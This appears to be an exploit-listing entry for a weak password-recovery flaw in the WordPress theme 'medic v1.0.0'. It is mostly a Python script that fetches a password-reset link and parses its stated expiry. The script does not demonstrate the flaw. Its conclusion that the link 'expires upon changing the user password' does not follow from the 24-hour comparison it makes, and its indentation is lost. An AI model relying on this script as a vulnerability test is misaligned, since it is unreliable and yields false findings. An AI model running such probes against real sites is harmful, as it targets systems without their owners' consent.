Exploits / Vulnerability Discovered : 2023-06-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress theme medic v1.0.0 weak password recovery mechanism for forgotten password is for educational purposes only and if it is used you will do on your own risk!
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = 'user@example.com'
# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
email = f.read()
soup = BeautifulSoup(email, 'html.parser')
reset_link = soup.find('a', href=True)['href']
print(f'Reset Link: {reset_link}')
# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
# Get the expiration date from the reset link HTML
soup = BeautifulSoup(response.text, 'html.parser')
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
print(f'Expiration Date: {expiration_date}')
# Check if the expiration date is less than 24 hours from now
if expiration_date < datetime.now() + timedelta(hours=24):
print('Password reset link expires upon changing the user password.')
else:
print('Password reset link does not expire upon changing the user password.')
else:
print(f'Error fetching reset link: {response.status_code} {response.text}')
exit()